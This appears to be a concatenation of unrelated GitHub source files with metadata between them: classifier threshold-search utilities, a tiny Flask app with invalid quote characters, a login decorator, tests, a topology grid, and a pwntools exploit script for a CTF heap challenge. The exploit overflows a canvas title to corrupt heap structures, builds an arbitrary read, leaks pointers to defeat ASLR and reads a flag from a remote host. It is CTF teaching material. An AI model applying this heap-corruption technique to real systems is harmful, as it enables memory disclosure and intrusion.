thresholds[class_index] = threshold
return metrics, thresholds
def get_multilabel_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
):
"""Finds best thresholds for multilabel classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels, numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = labels.shape[1]
metrics = [0.0] * num_classes
thresholds = [0.0] * num_classes
for class_index in range(num_classes):
best_metric, best_threshold = get_binary_threshold(
labels=labels[:, class_index], scores=scores[:, class_index], objective=objective,
)
metrics[class_index] = best_metric
thresholds[class_index] = best_threshold
return metrics, thresholds
def get_binary_threshold_cv(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_splits: int = 5,
num_repeats: int = 1,
random_state: int = 42,
):
"""Finds best threshold for binary classification task
based on cross-validation estimates.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, ]
labels: ground truth labels, numpy array with shape [num_examples, ]
objective: callable function, metric which we want to maximize
num_splits: number of splits to use for cross-validation
num_repeats: number of repeats to use for cross-validation
random_state: random state to use for cross-validation
Returns:
tuple with best found objective score and threshold
"""
rkf = RepeatedStratifiedKFold(
n_splits=num_splits, n_repeats=num_repeats, random_state=random_state
)
fold_metrics, fold_thresholds = [], []
for train_index, valid_index in rkf.split(labels, labels):
labels_train, labels_valid = labels[train_index], labels[valid_index]
scores_train, scores_valid = scores[train_index], scores[valid_index]
_, best_threshold = get_binary_threshold(
labels=labels_train, scores=scores_train, objective=objective,
)
valid_predictions = (scores_valid >= best_threshold).astype(np.int32)
best_metric_value = objective(labels_valid, valid_predictions)
fold_metrics.append(best_metric_value)
fold_thresholds.append(best_threshold)
return np.mean(fold_metrics), np.mean(fold_thresholds)
def get_multilabel_thresholds_cv(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_splits: int = 5,
num_repeats: int = 1,
random_state: int = 42,
):
"""Finds best thresholds for multilabel classification task
based on cross-validation estimates.
Args:
scores: estimated per-class scores/probabilities predicted by the model,
numpy array with shape [num_examples, num_classes]
labels: ground truth labels, numpy array with shape [num_examples, num_classes]
objective: callable function, metric which we want to maximize
num_splits: number of splits to use for cross-validation
num_repeats: number of repeats to use for cross-validation
random_state: random state to use for cross-validation
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = labels.shape[1]
metrics = [0.0] * num_classes
thresholds = [0.0] * num_classes
for class_index in range(num_classes):
best_metric, best_threshold = get_binary_threshold_cv(
labels=labels[:, class_index],
scores=scores[:, class_index],
objective=objective,
num_splits=num_splits,
num_repeats=num_repeats,
random_state=random_state,
)
metrics[class_index] = best_metric
thresholds[class_index] = best_threshold
return metrics, thresholds
def get_thresholds_greedy(
scores: np.ndarray,
labels: np.ndarray,
score_fn: Callable,
num_iterations: int = 100,
num_thresholds: int = 100,
thresholds: np.ndarray = None,
patience: int = 3,
atol: float = 0.01,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for classification task with brute-force algorithm.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
score_fn: callable function, based on (scores, labels, thresholds)
num_iterations: number of iteration for brute-force algorithm
num_thresholds: number of thresholds ot try for each class
thresholds: baseline thresholds, which we want to optimize
patience: maximum number of iteration before early stop exit
atol: minimum required improvement per iteration for early stop exit
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
if thresholds is None:
thresholds = [0.5] * num_classes
best_metric = score_fn(scores, labels, thresholds)
iteration_metrics = []
for i in range(num_iterations):
if len(iteration_metrics) >= patience:
if best_metric < iteration_metrics[i - patience] + atol:
break
for class_index in range(num_classes):
current_thresholds = thresholds.copy()
class_scores = []
class_thresholds = np.linspace(
scores[:, class_index].min(), scores[:, class_index].max(), num=num_thresholds,
)
for threshold in class_thresholds:
current_thresholds[class_index] = threshold
class_score = score_fn(scores, labels, current_thresholds)
class_scores.append(class_score)
best_class_score = np.max(class_scores)
best_score_index = np.argmax(class_scores)
if best_class_score > best_metric:
best_metric = best_class_score
thresholds[class_index] = class_thresholds[best_score_index]
iteration_metrics.append(best_metric)
return best_metric, thresholds
def _multilabel_score_fn(scores, labels, thresholds, objective):
predictions = np.greater(scores, thresholds).astype(np.int32)
return objective(labels, predictions)
def get_multilabel_thresholds_greedy(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_iterations: int = 100,
num_thresholds: int = 100,
thresholds: np.ndarray = None,
patience: int = 3,
atol: float = 0.01,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multilabel classification task with brute-force algorithm.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
num_iterations: number of iteration for brute-force algorithm
num_thresholds: number of thresholds ot try for each class
thresholds: baseline thresholds, which we want to optimize
patience: maximum number of iteration before early stop exit
atol: minimum required improvement per iteration for early stop exit
Returns:
tuple with best found objective score and per-class thresholds
"""
best_metric, thresholds = get_thresholds_greedy(
scores=scores,
labels=labels,
score_fn=partial(_multilabel_score_fn, objective=objective),
num_iterations=num_iterations,
num_thresholds=num_thresholds,
thresholds=thresholds,
patience=patience,
atol=atol,
)
return best_metric, thresholds
def _multiclass_score_fn(scores, labels, thresholds, objective):
scores_copy = scores.copy()
scores_copy[np.less(scores, thresholds)] = 0
predictions = scores_copy.argmax(axis=1)
return objective(labels, predictions)
def get_multiclass_thresholds_greedy(
scores: np.ndarray,
labels: np.ndarray,
objective: METRIC_FN,
num_iterations: int = 100,
num_thresholds: int = 100,
thresholds: np.ndarray = None,
patience: int = 3,
atol: float = 0.01,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multiclass classification task with brute-force algorithm.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
num_iterations: number of iteration for brute-force algorithm
num_thresholds: number of thresholds ot try for each class
thresholds: baseline thresholds, which we want to optimize
patience: maximum number of iteration before early stop exit
atol: minimum required improvement per iteration for early stop exit
Returns:
tuple with best found objective score and per-class thresholds
"""
best_metric, thresholds = get_thresholds_greedy(
scores=scores,
labels=labels,
score_fn=partial(_multiclass_score_fn, objective=objective),
num_iterations=num_iterations,
num_thresholds=num_thresholds,
thresholds=thresholds,
patience=patience,
atol=atol,
)
return best_metric, thresholds
def get_best_multilabel_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multilabel classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
best_metric, best_thresholds = 0.0, []
for baseline_thresholds_fn in [
get_baseline_thresholds,
get_multiclass_thresholds,
get_binary_threshold,
get_multilabel_thresholds,
]:
_, baseline_thresholds = baseline_thresholds_fn(
labels=labels, scores=scores, objective=objective,
)
if isinstance(baseline_thresholds, (int, float)):
baseline_thresholds = [baseline_thresholds] * num_classes
metric_value, thresholds_value = get_multilabel_thresholds_greedy(
labels=labels, scores=scores, objective=objective, thresholds=baseline_thresholds,
)
if metric_value > best_metric:
best_metric = metric_value
best_thresholds = thresholds_value
return best_metric, best_thresholds
def get_best_multiclass_thresholds(
scores: np.ndarray, labels: np.ndarray, objective: METRIC_FN,
) -> Tuple[float, List[float]]:
"""Finds best thresholds for multiclass classification task.
Args:
scores: estimated per-class scores/probabilities predicted by the model
labels: ground truth labels
objective: callable function, metric which we want to maximize
Returns:
tuple with best found objective score and per-class thresholds
"""
num_classes = scores.shape[1]
best_metric, best_thresholds = 0.0, []
labels_onehot = np.zeros((labels.size, labels.max() + 1))
labels_onehot[np.arange(labels.size), labels] = 1
for baseline_thresholds_fn in [
get_baseline_thresholds,
get_multiclass_thresholds,
get_binary_threshold,
get_multilabel_thresholds,
]:
_, baseline_thresholds = baseline_thresholds_fn(
labels=labels_onehot, scores=scores, objective=objective,
)
if isinstance(baseline_thresholds, (int, float)):
baseline_thresholds = [baseline_thresholds] * num_classes
metric_value, thresholds_value = get_multiclass_thresholds_greedy(
labels=labels, scores=scores, objective=objective, thresholds=baseline_thresholds,
)
if metric_value > best_metric:
best_metric = metric_value
best_thresholds = thresholds_value
return best_metric, best_thresholds
__all__ = [
"get_baseline_thresholds",
"get_binary_threshold",
"get_multiclass_thresholds",
"get_multilabel_thresholds",
"get_binary_threshold_cv",
"get_multilabel_thresholds_cv",
"get_thresholds_greedy",
"get_multilabel_thresholds_greedy",
"get_multiclass_thresholds_greedy",
"get_best_multilabel_thresholds",
"get_best_multiclass_thresholds",
]
|
[
"noreply@github.com"
] |
Pandinosaurus.noreply@github.com
|
598c1c9cd8f05d484e01315b7d163bcd17656212
|
0bc31d7f07a135e3909e7caf33246dd52999b50f
|
/common/decorator.py
|
0149f457a77e062c759d593242274aa58df0204c
|
[] |
no_license
|
shelmesky/wisemonitor
|
db022d3382fe39033ae53178edd7d4b6cfa1a95b
|
905fec5d58a08851089e39e617e8d52363b7f36c
|
refs/heads/master
| 2021-01-10T21:04:35.992790
| 2014-06-30T10:56:53
| 2014-06-30T10:56:53
| 12,806,391
| 4
| 5
| null | 2016-07-14T07:41:52
| 2013-09-13T09:47:01
|
Go
|
UTF-8
|
Python
| false
| false
| 328
|
py
|
import functools
def require_login(method):
def wrapper(self, *args, **kwargs):
user = self.get_secure_cookie("wisemonitor_user")
uri = self.request.uri
if not user:
self.redirect("/login/?next=%s" % uri)
else:
return method(self, *args, **kwargs)
return wrapper
|
[
"roy.lieu@gmail.com"
] |
roy.lieu@gmail.com
|
3b2bf05909e2b6c2de791c1388a76308d4c4e735
|
1ad3409413ee0bd02e81199efd1f83469b25737c
|
/2020-09-16/2.py
|
6ff89e40f649c40b8595660cab7acba17613d280
|
[] |
no_license
|
montrehack/challenges
|
4711552e968fd1a0783659f708586d347d744672
|
d5f419417a651c1ee456d5fed49a4bb06476f1b9
|
refs/heads/master
| 2022-05-09T09:52:51.609548
| 2022-04-24T00:37:45
| 2022-04-24T00:37:45
| 12,901,416
| 28
| 12
| null | 2022-04-24T00:37:46
| 2013-09-17T17:00:54
|
PHP
|
UTF-8
|
Python
| false
| false
| 9,036
|
py
|
from pwn import *
from struct import pack, unpack
from sys import exit
DEBUG = False
REMOTE = None
REMOTE = 'ctf.segfault.me'
RVA_HEAP_ALLOC = 0xEDE # readelf -s chal | grep heap_alloc (Windows)
RVA_HEAP_ALLOC = 0x145E # readelf -s chal | grep heap_alloc (Linux)
RVA_FLAG_TWO = 0x203020 # readelf -s chal | grep flag_two (Windows)
RVA_FLAG_TWO = 0x5020 # readelf -s chal | grep flag_two (Linux)
if DEBUG:
P = gdb.debug('./chal')
elif REMOTE:
P = remote(REMOTE, 3000)
else:
P = process(['./chal'])
P.recvuntil("> ")
def run(cmd):
P.sendline(cmd)
out = P.recvuntil("> ")
return out
"""
Things are a bit more complicated now, since the second flag is not on the heap.
GOAL:
We will need to create an arbitrary read primitive that lets us read anywhere we want.
Of course, we also need to figure out where the second flag is, and this means defeating ASLR.
ARBITRARY READ:
In challenge 1, we overwrote a `canvas_t` to corrupt its canvas->private flag. In doing so,
you may have noticed that we corrupted the width and height of the canvas. Going further,
we should also be able to corrupt the `canvas->data` base address. Printing a canvas with a corrupt
`canvas->data` will likely result in a segfault, but it can also be used to perform arbitrary reads
if we can write a valid address in the `data` field.
Recall the canvas_t layout:
typedef struct canvas_
{
char *title; // 8B
uint16_t width, height; // 4B
uint16_t private; // 2B (canvas_t + 12)
uint16_t id; // 2B
char *data; // 8B
struct canvas_ *next; // 8B
} canvas_t; // 32B (0x20)
If we overwrite data with the address of the second FLAG, we can simply print this canvas with its new ID
to recover the FLAG.
DEFEATING ASLR:
To defeat ASLR, we will need the address of any symbol in the binary, since we can compute the base
address using the formula `BASE = ADDRESS - RVA`. Once we know the base address, we can compute the absolute
address of any symbol in the binary using the same formula.
`readelf -s chal` shows that there is a symbol called `flag_two` at RVA 0x203020.
EXPLOIT:
We know, from reading through `heap.h` that `alloc_t` has a chunk pointer, which has a
pointer to the heap, which ultimately has a pointer to the allocator functions
(`heap_free` and `heap_grow`). If we can leak this address, we can then leak the second flag.
It might be tempting to try a technique similar to the first challenge, but the `canvas->title` overflow
is quite limiting as it will stop reading bytes at the first NUL terminator it encounters, and
would require continually re-allocating the preceding canvas.
A more reliable solution is to use a combination of 3 canvas instances to build an easy to use
arbitrary read primitive.
Given the (simplified) heap layout:
+----------+----------+----------+
| Canvas 1 | Canvas 2 | Canvas 3 |
+----------+----------+----------+
The idea is as follows:
1. Canvas 1 is freed, and re-allocated, overflowing its `title` field to
corrupt canvas 2's width and height. The resulting `c2->data` can now
be indexed out of bounds when performing an `edit` command.
2. `edit` is used on Canvas 2 to accurately corrupt canvas 3.
3. Canvas 3 is used to perform arbitrary reads of the desired size.
4. Canvas 2 and 3 are used in conjunction to perform several complex reads
without needing re-allocations.
pwndbg> hexdump ((uint8_t*)c) 100
+0000 0x7ffff75e3030 70 30 5e f7 ff 7f 00 00 27 00 0f 00 00 00 01 00 │p0^.│....│'...│....│
+0010 0x7ffff75e3040 a0 30 5e f7 ff 7f 00 00 00 00 00 00 00 00 00 00 │.0^.│....│....│....│
+0020 0x7ffff75e3050 40 95 75 55 55 55 00 00 10 00 00 00 00 00 00 00 │@.uU│UU..│....│....│
+0030 0x7ffff75e3060 00 00 00 00 00 00 00 00 80 30 5e f7 ff 7f 00 00 │....│....│.0^.│....│
>> +0040 0x7ffff75e3070 41 74 61 72 69 00 00 00 00 00 00 00 00 00 00 00 │Atar│i...│....│....│ ; c1->title
+0050 0x7ffff75e3080 40 95 75 55 55 55 00 00 4b 02 00 00 00 00 00 00 │@.uU│UU..│K...│....│
+0060 0x7ffff75e3090 00 00 00 00 │....│ │ │ │
...
pwndbg> hexdump 0x7ffff75e3070+635 v
+0000 0x7ffff75e32eb 40 95 75 55 55 55 00 00 20 00 00 00 00 00 00 00 │@.uU│UU..│....│....│
+0010 0x7ffff75e32fb 00 00 00 00 00 00 00 00 2b 33 5e f7 ff 7f 00 00 │....│....│+3^.│....│
+0020 0x7ffff75e330b 4b 33 5e f7 ff 7f 00 00 3d 00 18 00 00 00 02 00 │K3^.│....│=...│....│ ; c2->width (0x3d == 61)
+0030 0x7ffff75e331b 7b 33 5e f7 ff 7f 00 00 30 30 5e f7 ff 7f 00 00 │{3^.│....│00^.│....│
Calculate the c2->width offset:
0x7ffff75e330b + 8 == 0x7ffff75e3313
0x7ffff75e3313 - 0x7ffff75e3070 == 675
Calculate the c3->width offset from c2->data to be able to corrupt c3.
pwndbg> hexdump 0x7ffff75e330b+0x50
+0000 0x7ffff75e335b 40 95 75 55 55 55 00 00 ba 05 00 00 00 00 00 00 │@.uU│UU..│....│....│
+0010 0x7ffff75e336b 00 00 00 00 00 00 00 00 35 39 5e f7 ff 7f 00 00 │....│....│59^.│....│
+0020 0x7ffff75e337b 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │....│....│....│....│
c2->data = 0x7ffff75e337b
pwndbg> hexdump 0x7ffff75e3030+0x40+675+1500 150 v
+0000 0x7ffff75e38ef 20 20 20 20 20 20 20 2d 2d 27 20 20 20 20 20 20 │....│...-│-'..│....│
+0010 0x7ffff75e38ff 20 20 60 2d 60 2d 2d 60 2d 2d 2e 5f 5f 5f 2e 2d │..`-│`--`│--._│__.-│
+0020 0x7ffff75e390f 27 2d 27 2d 2d 2d 20 20 20 20 20 20 20 20 20 20 │'-'-│--..│....│....│
+0030 0x7ffff75e391f 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 │....│....│....│....│
+0040 0x7ffff75e392f 20 20 20 20 00 00 40 95 75 55 55 55 00 00 20 00 │....│..@.│uUUU│....│
+0050 0x7ffff75e393f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 75 39 │....│....│....│..u9│
+0060 0x7ffff75e394f 5e f7 ff 7f 00 00 95 39 5e f7 ff 7f 00 00 25 00 │^...│...9│^...│..%.│ ; c3->width (0x25)
+0070 0x7ffff75e395f 01 00 01 00 03 00 c5 39 5e f7 ff 7f 00 00 0b 33 │....│...9│^...│...3│ ; c3->height, c3->private, c3->id, c3->data
+0080 0x7ffff75e396f 5e f7 ff 7f 00 00 40 95 75 55 55 55 00 00 10 00 │^...│..@.│uUUU│....│
+0090 0x7ffff75e397f 00 00 00 00 00 00
0x7ffff75e395d - 0x7ffff75e337b = 1506
"""
C1_SIZE = 675 # Offset between c1->title and c2->width
C3_SIZE = 1506 # offset between c2->data and c3->width
def corrupt_c2():
info("Corrupting canvas2")
run("del 1")
run("new")
run("10")
run("10")
run("A" * C1_SIZE + "\xFF\xFF\x01")
# Now c2->width is 0xFFFF and c2->height is 1.
def read(addr, size):
info(f"Reading {size} bytes @ 0x{addr:016x}")
cmd = (
pack("<H", size) # c3->width
+ pack("<H", 1) # c3->height
+ b"\0\0" # c3->private
+ pack("<H", 3) # c3->id
+ pack("<Q", addr) # c3->data
)
if b"\x0a" in cmd:
error("Bad byte in canvas3! new line is not allowed.")
exit(1)
P.sendline(
"edit 2"
) # We will edit the 65535x1 buffer. `fgets` stops reading at `\n`.
P.recvuntil("New Data: ")
P.send((b"3" * C3_SIZE) + cmd + b"\x0a")
P.recvuntil(b"> ")
out = run("show 3")
return out[:size]
corrupt_c2()
# Now let's show the buffer for c2->data, which will leak 0xFFFF bytes including the actual buffer bytes.
# This will let us `show 2` and leak the address of the chunk.
# Remember that the canvas_t struct starts with title, width, so we can use C3_SIZE - 8 - sizeof(alloc_t) to calculate the
# position of alloc->chunk.
CHUNK_OFFSET = C3_SIZE - 8 - 32
(chunk_ptr,) = unpack("<Q", run("show 2")[CHUNK_OFFSET : CHUNK_OFFSET + 8])
success(f"chunk @ 0x{chunk_ptr:x}")
# Now we can configure C3 to leak the chunk_t struct, which contains the heap pointer:
#
# typedef struct chunk_
# {
# struct heap_ *heap;
# struct alloc_ *allocs;
# struct chunk_ *next;
# } chunk_t;
(heap_ptr,) = unpack("<Q", read(chunk_ptr, 8))
success(f"heap @ 0x{heap_ptr:x}")
# Finally we can leak the `heap_alloc` address to defeat ASLR. Having a known function pointer
# in the image will let us compute the base address, and any other known symbol in the image.
# heap_alloc is located at `heap_t + 16`.
(heap_alloc,) = unpack("<Q", read(heap_ptr + 16, 8))
success(f"heap_alloc @ 0x{heap_alloc:x}")
BASE = heap_alloc - RVA_HEAP_ALLOC
FLAG = BASE + RVA_FLAG_TWO
info(f"BaseAddress=0x{BASE:x} FlagAddress=0x{FLAG:x}")
flag = read(FLAG, 37).decode()
success(f"FLAG: {flag}")
P.close()
|
[
"alex@segfault.me"
] |
alex@segfault.me
|
fe15e96de78340081044c390097e0aa7fe290d4f
|
45a00ac27ac8745e41ee89e89ae798ab052896d0
|
/interface1/venv/case/mail.py
|
5a07871a1b4d241c25c33d70f9ba2624aebe55c8
|
[] |
no_license
|
jiangll888/interface
|
c7b96f5c8105e66a98f8e951b897c751d882cd6d
|
3f3fa6d1d9591a8331eb660aa040861edb44a610
|
refs/heads/master
| 2020-04-30T13:10:59.372448
| 2019-03-22T02:52:18
| 2019-03-22T02:52:18
| 176,848,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 992
|
py
|
from util.send_mail import SendMail
from util.db_config import OperaDB
class RunMail:
def send_mail(self,filename=None):
op = OperaDB()
se = SendMail()
result_list = op.get_all("select result from `case`;")
result_list1 = [[value for key,value in d.items()][0] for d in result_list]
pass_count = 0.0
fail_count = 0.0
for i in result_list1:
if i == "pass":
pass_count += 1
else:
fail_count += 1
print(pass_count,fail_count)
count_num = pass_count +fail_count
result = "%.2f%%" % (pass_count/count_num*100)
print(result)
content = "本次自动化测试结果:通过"+ str(pass_count) + "个,失败" + str(fail_count) +"个,通过率为" \
+ str(result)
se.send_mail(["jiangliulin@163.com"],"自动化结果",content,filename)
if __name__ == "__main__":
r = RunMail()
r.send_mail("../report/test.html")
|
[
"jiangliulin@163.com"
] |
jiangliulin@163.com
|
00c3a56f1c545aa36ab9dc7ecd7a9bb798961fe0
|
caa175a933aca08a475c6277e22cdde1654aca7b
|
/tests/schema/product/query/snapshots/snap_test_all_product_file_paths.py
|
b5339588cbf10678ad6205db41a22f2ee60c7a11
|
[
"MIT"
] |
permissive
|
simonsobs/acondbs
|
01d68ae40866461b85a6c9fcabdfbea46ef5f920
|
d18c7b06474b0dacb1dcf1c6dbd1e743407645e2
|
refs/heads/main
| 2023-07-07T04:33:40.561273
| 2023-06-28T22:08:00
| 2023-06-28T22:08:00
| 239,022,783
| 0
| 1
|
MIT
| 2023-06-26T20:36:39
| 2020-02-07T21:07:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,557
|
py
|
# -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['test_schema[all] 1'] = {
'data': {
'allProductFilePaths': {
'edges': [
{
'node': {
'note': None,
'path': 'site2:/another/way/map1',
'pathId': '1',
'product': {'name': 'map1'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/map2',
'pathId': '2',
'product': {'name': 'map2'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/map3',
'pathId': '3',
'product': {'name': 'map3'},
}
},
{
'node': {
'note': None,
'path': 'site2:/another/way/map3',
'pathId': '4',
'product': {'name': 'map3'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/beam1',
'pathId': '5',
'product': {'name': 'beam1'},
}
},
{
'node': {
'note': None,
'path': 'site2:/another/way/beam1',
'pathId': '6',
'product': {'name': 'beam1'},
}
},
{
'node': {
'note': None,
'path': 'site1:/path/to/beam2',
'pathId': '7',
'product': {'name': 'beam2'},
}
},
{
'node': {
'note': 'sample comment',
'path': 'site1:/path/to/map1',
'pathId': '8',
'product': {'name': 'map1'},
}
},
],
'totalCount': 8,
}
}
}
|
[
"tai.sakuma@gmail.com"
] |
tai.sakuma@gmail.com
|
41f5580fcdacf988e3d0088c4ff35723a7277bb3
|
d9563800aabef6dd47c3ad28491686ebe552bf10
|
/web.py
|
ffa925faad9315654c04e91ab80269e992f92551
|
[] |
no_license
|
drovn003/heroku
|
b88f858b7328500b39c5a418aefcab3c1e7a330e
|
d7560535a65f49e6675f92a68cd9319092ca9de5
|
refs/heads/master
| 2020-04-02T18:30:07.883122
| 2018-10-25T16:30:07
| 2018-10-25T16:30:07
| 154,702,838
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
from flask import Flask
app = Flask(__name__)
@app.route(‘/‘)
def index():
return ‘hello, wold’
|
[
"noreply@github.com"
] |
drovn003.noreply@github.com
|
b6ebc8726aa81143cc63fd8d1964d325186e3b94
|
96cb22932f6f17a64d4ae54cd3e5db11da1e7092
|
/tests/unit/test_pathify_by_key_ends.py
|
b0cccdc6152b7b46c83d5ec7da17e3099a79a6ae
|
[
"MIT"
] |
permissive
|
xguse/snaketools
|
4f076cce25f5b4dcf7f5ad542e2a5ebef5ff52a3
|
ba3b68088bd9bb656b9ad64656a537bc1cfccdb4
|
refs/heads/master
| 2021-01-23T12:05:00.217621
| 2018-06-08T16:04:08
| 2018-06-08T16:04:08
| 102,645,205
| 1
| 0
|
MIT
| 2018-06-01T17:03:32
| 2017-09-06T18:41:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,349
|
py
|
"""Unit test the pathify_by_key_ends function."""
from pathlib import Path
from snaketools import snaketools
from tests.test_snaketools import * # noqa: F403,F401
def test_pathify_this():
"""Ensure pathify_this returns expected values."""
assert snaketools.pathify_this("TEXT_FILE")
assert snaketools.pathify_this("TEXT_PATH")
assert snaketools.pathify_this("TEXT_DIR")
assert snaketools.pathify_this("DIR")
assert not snaketools.pathify_this("TEXT")
def test_pathify_by_key_ends(config_1_dict):
"""Ensure pathify_by_key_ends returns expected types."""
original = config_1_dict
pathified = snaketools.pathify_by_key_ends(dictionary=original)
assert isinstance(pathified.COMMON, dict)
assert isinstance(pathified.COMMON.RUN_NAME, str)
assert isinstance(pathified.COMMON.OUT_DIR, Path)
assert isinstance(pathified.COMMON.INTERIM_DIR, Path)
assert isinstance(pathified.COMMON.DRAW_RULE, str)
assert isinstance(pathified.COMMON.DRAW_PRETTY_NAMES, bool)
assert isinstance(pathified.RULE_1, dict)
assert isinstance(pathified.RULE_1.PARAMS, dict)
assert isinstance(pathified.RULE_1.PARAMS.PARAM_1, int)
assert isinstance(pathified.RULE_1.PARAMS.PARAM_2, str)
assert isinstance(pathified.RULE_1.IN, dict)
assert isinstance(pathified.RULE_1.IN.IN_FILE_1_PATH, Path)
|
[
"w.gus.dunn@gmail.com"
] |
w.gus.dunn@gmail.com
|
34504f3e195a7d0a38dcbf2515ee3814f9664a6d
|
f288b7103133eb101304308d4f4c9c827b732056
|
/experiences/sofaSceneLowBridge/topo.py
|
c98a9bb703207245cdb091af83f01ef15927053d
|
[] |
no_license
|
zaneck/evolveRobots
|
3c9dd1b0196df28b2c33ffd3c500dd7cbaa33ba2
|
02616fb8dbe1fffd57cd6e078338a7a394d010de
|
refs/heads/master
| 2020-04-11T01:29:27.124160
| 2016-09-30T12:03:31
| 2016-09-30T12:03:31
| 60,244,000
| 1
| 0
| null | 2016-09-29T11:46:00
| 2016-06-02T07:56:10
|
Python
|
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
# topology = [
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
# [1,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,0,0,1,1]
# ]
topology = [
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0],
[0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0],
[0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0],
[0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0],
[0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]
]
|
[
"val.owczarek@gmail.com"
] |
val.owczarek@gmail.com
|
c92f83856a460fbd76d55aecce1634bc80da397a
|
77f7d3c94a696f02249440d24f099baafa5dd499
|
/g1scraper/scrap.py
|
4ede4acdf1861d41ef8a9dc91038488418d69be1
|
[
"Apache-2.0"
] |
permissive
|
schneider8357/g1scraper
|
eabe85fc5907204fa744559aa4ad34b93f3c6e3c
|
a756c652ed121a7f7109cbdaec5d11f5dd277c0c
|
refs/heads/main
| 2023-06-25T10:31:13.445238
| 2021-08-03T15:26:18
| 2021-08-03T15:26:18
| 392,109,494
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,060
|
py
|
"""Funcoes de scraping."""
import collections
import json
from bs4 import BeautifulSoup
import requests
